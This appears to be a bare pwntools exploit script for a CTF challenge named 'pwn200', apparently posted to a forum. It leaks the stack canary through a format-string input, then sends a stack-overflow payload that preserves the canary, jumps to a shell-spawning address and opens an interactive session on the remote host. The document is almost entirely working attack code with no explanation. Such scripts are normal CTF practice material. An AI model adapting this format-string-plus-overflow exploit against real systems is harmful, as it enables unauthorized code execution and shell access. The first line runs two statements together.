pwn200
from pwn import *io = remote('xuenixiang.cn','22943')
# io = process('./pwn200')
io.sendline(b"%15$x%16$x")
recv = io.recv()
canary = int(recv[0:8],16)
then = int(recv[8:16],16)
#canary = int(io.recv(), 16)
print(hex(canary),hex(then))
log.info("canary: 0x%x" % canary)
print(type(p32(canary)))
print(p32(canary)[1:])
print(p32(canary))
binsh = 0x08048556#0x80491a2
payload = b"A" * 0x28 + p32(canary) +p32(then) + b"A" * 24 + p32(binsh)
#payload = "A" * 0x28 + p32(canary) + "A" * 12 + p32(binsh)
io.sendline(payload)
io.interactive()
页:
[1]